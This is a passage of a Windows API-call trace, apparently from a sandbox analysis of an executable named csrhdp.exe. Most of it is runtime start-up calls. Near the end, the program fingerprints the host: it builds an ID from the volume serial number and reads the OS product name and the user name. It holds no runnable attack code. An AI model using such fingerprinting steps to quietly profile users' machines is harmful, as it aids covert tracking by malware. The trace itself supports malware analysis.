!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᔠBĀ") returned 256 [0023.442] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.442] GetLastError () returned 0x57 [0023.442] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0023.443] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0023.443] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᔠBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0023.443] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᔠBĀ", cchSrc=256, lpDestStr=0x18f2d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0023.443] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18fcac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÂU…=èþ\x18", lpUsedDefaultChar=0x0) returned 256 [0023.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0023.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdac, cbMultiByte=256, lpWideCharStr=0x18f508, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0023.443] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0023.443] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f2f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0023.443] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18fbac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÂU…=èþ\x18", lpUsedDefaultChar=0x0) returned 256 [0023.443] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x2fd088 [0023.443] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x45ec00, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csrhdp.exe")) returned 0x30 [0023.443] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x39) returned 0x2f4cc0 [0023.443] RtlInitializeSListHead (in: ListHead=0x45e3b0 | out: ListHead=0x45e3b0) [0023.443] GetLastError () returned 0x0 [0023.443] SetLastError (dwErrCode=0x0) [0023.443] GetEnvironmentStringsW () returned 0x2ff498* [0023.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0023.443] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x565) returned 0x2fff70 [0023.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2fff70, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0023.444] FreeEnvironmentStringsW (penv=0x2ff498) returned 1 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x98) returned 0x2fd110 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1f) returned 0x2feda8 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x36) returned 0x2ef260 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x37) returned 0x2fd1b0 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x3c) returned 0x2f4d08 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x31) returned 0x2fd1f0 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x17) returned 0x2fd230 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x24) returned 0x2f8d10 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x14) returned 0x2fd250 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xd) returned 0x2f16b0 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x25) returned 0x2f8d40 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x39) returned 0x2f4d50 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x18) returned 0x2ff498 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x17) returned 0x2ff4b8 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe) returned 0x2f16c8 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x69) returned 0x2ff4d8 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x3e) returned 0x2f4d98 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1b) returned 0x2fedd0 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1d) returned 0x2fedf8 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x48) returned 0x2f4098 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2ff550 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x18) returned 0x2ff570 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1b) returned 0x2fee20 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x24) returned 0x2f8d70 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x29) returned 0x2f9320 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1e) returned 0x2fee48 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x41) returned 0x2f40e8 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x17) returned 0x2ff590 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xf) returned 0x2f16e0 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x16) returned 0x2ff5b0 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x2a) returned 0x2f9358 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x29) returned 0x2f9390 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x15) returned 0x2ff5d0 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1e) returned 0x2fee70 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x2a) returned 0x2f93c8 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2ff5f0 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x18) returned 0x2ff610 [0023.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x46) returned 0x2f4138 [0023.444] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fff70 | out: hHeap=0x2e0000) returned 1 [0023.445] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeConditionVariable") returned 0x77168456 [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="SleepConditionVariableCS") returned 0x76cb4b32 [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="WakeAllConditionVariable") returned 0x7719409d [0023.445] RtlInitializeConditionVariable () returned 0x45e38c [0023.445] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="InitOnceExecuteOnce") returned 0x76c4d627 [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b [0023.445] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreW") returned 0x76c4ca5a [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195 [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381 [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088 [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7 [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24 [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8 [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11 [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0 [0023.446] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleEx") returned 0x76c4c78f [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandle") returned 0x76c5cbfc [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeConditionVariable") returned 0x77168456 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="WakeConditionVariable") returned 0x771d7de4 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="WakeAllConditionVariable") returned 0x7719409d [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="SleepConditionVariableCS") returned 0x76cb4b32 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeSRWLock") returned 0x77168456 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="AcquireSRWLockExclusive") returned 0x771629f1 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77174892 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseSRWLockExclusive") returned 0x771629ab [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="SleepConditionVariableSRW") returned 0x76cb4b74 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWork") returned 0x76c4ee45 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="SubmitThreadpoolWork") returned 0x771a8491 [0023.447] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWork") returned 0x7719d8e2 [0023.448] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1 [0023.448] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751 [0023.448] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0023.448] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x800) returned 0x2ff630 [0023.448] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0023.448] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40dcb7) returned 0x0 [0023.448] GetCurrentThread () returned 0xfffffffe [0023.448] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x18ff14, lpExitTime=0x18ff1c, lpKernelTime=0x18ff1c, lpUserTime=0x18ff1c | out: lpCreationTime=0x18ff14, lpExitTime=0x18ff1c, lpKernelTime=0x18ff1c, lpUserTime=0x18ff1c) returned 1 [0023.448] RtlInitializeSListHead (in: ListHead=0x45f338 | out: ListHead=0x45f338) [0023.449] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x54) returned 0x300280 [0023.449] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc) returned 0x2f16f8 [0023.449] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x14) returned 0x3002e0 [0023.449] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd3c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csrhdp.exe")) returned 0x30 [0023.449] GetSystemInfo (in: lpSystemInfo=0x18de0c | out: lpSystemInfo=0x18de0c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0023.449] GetVolumeInformationW (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18de34, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18de34*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0023.450] GetProcessHeap () returned 0x2e0000 [0023.450] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x40) returned 0x2f4de0 [0023.450] GetProcessHeap () returned 0x2e0000 [0023.450] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x40) returned 0x2f4e28 [0023.450] wsprintfW (in: param_1=0x2f4de0, param_2="%u" | out: param_1="1278171767") returned 10 [0023.450] wsprintfW (in: param_1=0x2f4e28, param_2="%u" | out: param_1="1972518758") returned 10 [0023.450] lstrcatW (in: lpString1="", lpString2="1278171767" | out: lpString1="1278171767") returned="1278171767" [0023.450] lstrcatW (in: lpString1="1278171767", lpString2="1972518758" | out: lpString1="12781717671972518758") returned="12781717671972518758" [0023.450] GetProcessHeap () returned 0x2e0000 [0023.450] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4de0 | out: hHeap=0x2e0000) returned 1 [0023.450] GetProcessHeap () returned 0x2e0000 [0023.450] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4e28 | out: hHeap=0x2e0000) returned 1 [0023.450] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fed8 | out: phkResult=0x18fed8*=0x94) returned 0x0 [0023.450] RegQueryValueExW (in: hKey=0x94, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x18f850, lpcbData=0x18feac*=0x200 | out: lpType=0x0, lpData=0x18f850*=0x57, lpcbData=0x18feac*=0x2e) returned 0x0 [0023.450] RegCloseKey (hKey=0x94) returned 0x0 [0023.450] GetUserNameW (in: lpBuffer=0x18e64c, pcbBuffer=0x18feb0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18feb0) returned 1 [0023.454] lstrcpyW (in: lpString1=0x18e850, lpString2="12781717671972518758" | out: lpString1="12781717671972518758") 